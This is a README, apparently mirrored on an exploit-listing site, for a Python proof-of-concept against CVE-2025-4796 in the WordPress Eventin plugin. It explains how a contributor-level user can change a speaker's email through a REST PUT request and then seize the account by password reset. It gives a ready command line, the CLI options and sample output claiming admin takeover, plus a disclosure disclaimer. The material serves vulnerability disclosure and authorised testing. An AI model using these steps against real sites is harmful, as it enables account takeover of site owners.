Share
## https://sploitus.com/exploit?id=76E61648-C58A-56AE-8B14-C9341620E8B4
# CVE-2025-4796
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

# ๐Ÿ›ก๏ธ Eventin 

Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.

## ๐Ÿงฐ Script (PoC)
Filename: `CVE-2025-4796.py`

This script automates the steps:
1. Log in to the target WordPress site using supplied credentials.
2. Extract the required X-WP-Nonce 
3. Send a PUT request to `/wp-json/eventin/v2/speakers/` to update the speaker's email.
4. Print and format the JSON response and a professional success message.

Requirements:
- Python 3.8+
- requests

Installation:
```sh
pip install requests
```

## ๐Ÿš€ Usage
Run the script from the command line:

```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```

Show script help:

```sh
python CVE-2025-4796.py -h
```

## ๐Ÿ“ CLI Options (help)
usage: t.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade

(Notes: all help text and runtime output are English and formatted professionally.)

## โœ… Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : Nxploited@gmail.com

[!] Please reset your password using the email: Nxploited@gmail.com
```

## โš–๏ธ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).

## ๐Ÿงพ What the script does (concise)
- Validates inputs (URL, email) and normalizes URL schema.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.

## ๐Ÿ‘ค Credits
By: Khaled Alenaz (Nxploited)  
GitHub: https://github.com/Nxploited/